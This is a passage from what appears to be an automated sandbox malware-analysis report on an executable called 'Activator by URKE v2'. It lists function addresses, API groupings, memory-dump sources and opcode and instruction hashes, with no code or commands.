                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2721E762A28B8941EA10AB65E95026EA360FB88FD0F904232EADC43B95CF3CD190C700
                                                                                                                                                                                                                                                  Function 00007FF7E5EF5FF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1203560049-0
                                                                                                                                                                                                                                                  • Opcode ID: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                                                                                                                                                                                                                                  • Instruction ID: bb29dba1b31f42b19ed2733dab6888e51e2482a5fa317e84c761358b2bddab4d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6212B22B1878942EA20AF24E46036DA361FF88F94FD04232EEDDC6695DF3CD550C721
                                                                                                                                                                                                                                                  Function 00007FF7E5EF5790 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3118131910-0
                                                                                                                                                                                                                                                  • Opcode ID: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
                                                                                                                                                                                                                                                  • Instruction ID: d3422bd826fe6ee0a24b178019806f750af65e9afb3916e395e2547749e10784
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF21D822A1878981FA10AB24F56036AA360FB84FD4FC00236EADD86695DF3CD551C721
                                                                                                                                                                                                                                                  Function 00007FF7E5EF5890 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1203560049-0
                                                                                                                                                                                                                                                  • Opcode ID: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
                                                                                                                                                                                                                                                  • Instruction ID: b1320a012fe44497f83a0f152c3362d336c2b64be9bf04c0f30aaf198ba1c0dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1721A932A1878942EA10AB24E554369A361FB88FA4FD04232EAED87695DF3CD5418B11
                                                                                                                                                                                                                                                  Function 00007FF7E5F1F444 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                  • Opcode ID: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                                                                                                                                                                                                                                  • Instruction ID: ef94c5e10182ea3224415be7f132502c664e447baf92ef8f61c4e2df1224f5b8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE04864B1430D82EB047B3199717F553569F44F41F804439CC8E83357CD3DA4498272
                                                                                                                                                                                                                                                  Function 00007FF7E5F06D28 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  • Opcode ID: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
                                                                                                                                                                                                                                                  • Instruction ID: 6cbc66c89b46025fba5366bc3e199f9f01f9a87f03414a039d83576016cb0659
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E271B062B14A4A85FA00EB64E4643ECA366AF44FE8F840133DA2C877D9DE3CE451C365
                                                                                                                                                                                                                                                  Function 00007FF7E5EF491C Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                                  • Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                                                                                                                                                                                                                  • Instruction ID: 2a1fc5d6630cf47798d6a4363f5187d9ae2c324201a72b59f019e0a1c779c645
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79310B22B19B8A42EA706B19D6607B8A350AF44FD4FC40133DE9D8B794EE3CE4518732
                                                                                                                                                                                                                                                  Function 00007FF7E5F047F0 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3587649625-0
                                                                                                                                                                                                                                                  • Opcode ID: 78dcec84b2b2081ffdb456cee5bc94528ec2c7f435e71baf867d0267fc902a63
                                                                                                                                                                                                                                                  • Instruction ID: 0179c57a3e345f0dc47ab7e3fccb3d7a8832be60e598f859c79c2e920007c361
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78dcec84b2b2081ffdb456cee5bc94528ec2c7f435e71baf867d0267fc902a63
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5941F662F14B8985FF00AB78D4553ECA362EF44BA8F800636DE9C53AD9DE78D440C355
                                                                                                                                                                                                                                                  Function 00007FF7E5EF1EBC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1746051919-0
                                                                                                                                                                                                                                                  • Opcode ID: a9e66eae6c10b7998c2c5de9bd97b12879dcbec8aef09866538b836a72d0f55b
                                                                                                                                                                                                                                                  • Instruction ID: 5330912486d3ac044a62223f604a984912d6a670c91053e61062665aa38d6d30
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9e66eae6c10b7998c2c5de9bd97b12879dcbec8aef09866538b836a72d0f55b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F831F422B1878942EA14AB15E5643A9F361EF84F90FC44236EACC4BBD6DF3CE550C721
                                                                                                                                                                                                                                                  Function 00007FF7E5EF4C70 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1392018926-0
                                                                                                                                                                                                                                                  • Opcode ID: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                                                                                                                                                                                                                                  • Instruction ID: 1cd5fe865327ba5cdb20dace62c5373155c2077cb0bb0f8a5471fa9909eed67e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F21F662B0978A55F971AB11D2207B5A790AF01F98FD45132CE8C8A391EE3CD4A6C332
                                                                                                                                                                                                                                                  Function 00007FF7E5EFAEE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2948472770-0
                                                                                                                                                                                                                                                  • Opcode ID: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                                                                                                                                                                                                                  • Instruction ID: a05e670182378e22cb02afc86eecb498480b937bd7d0c185e6f01402483d7033
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A118EB5B0860986E600AF06E9506A9F7A1BF88FC0BD84437DA4CD7720DE3CE6618365
                                                                                                                                                                                                                                                  Function 00007FF7E5EF4D50 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                                  • Opcode ID: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                                                                                                                                                                                                                  • Instruction ID: 21a3e0e78d8eb0199d837490277b6eed1dd65e249eb0b34129bf675a3ffc193f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F11C661A1874581EB20AB24E550378B260FF44FB4FD40332DABD8A2D4DF3DD562C322
                                                                                                                                                                                                                                                  Function 00007FF7E5EF215C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ItemRectTextWindow$Clientswprintf
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3322643685-0
                                                                                                                                                                                                                                                  • Opcode ID: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                                                                                                                                                                                                                  • Instruction ID: 677a383673391e2d32b6dec53536b608bab8638e48db39bac947251a1311f213
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3016D50A0934E82FB097B51A9283B99351AF45F40FC80036CDCD8A699DF7CEE95C332
                                                                                                                                                                                                                                                  Function 00007FF7E5F15AE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1173176844-0
                                                                                                                                                                                                                                                  • Opcode ID: 62452318fc7dfcde2a8969d92c41a5d48a191f134ba85602d2db1b2b9708db7f
                                                                                                                                                                                                                                                  • Instruction ID: 34b8798780b0cff11971ce6111fb69a2876c83e9a5aa9645d3a1ceed0489e5e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62452318fc7dfcde2a8969d92c41a5d48a191f134ba85602d2db1b2b9708db7f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37E08C00E0910F40FC1C727117753F480800F19F71E980B32D83DC92C3AC3CA0568632
                                                                                                                                                                                                                                                  Function 00007FF7E5F20E1C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                                                                  • Opcode ID: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
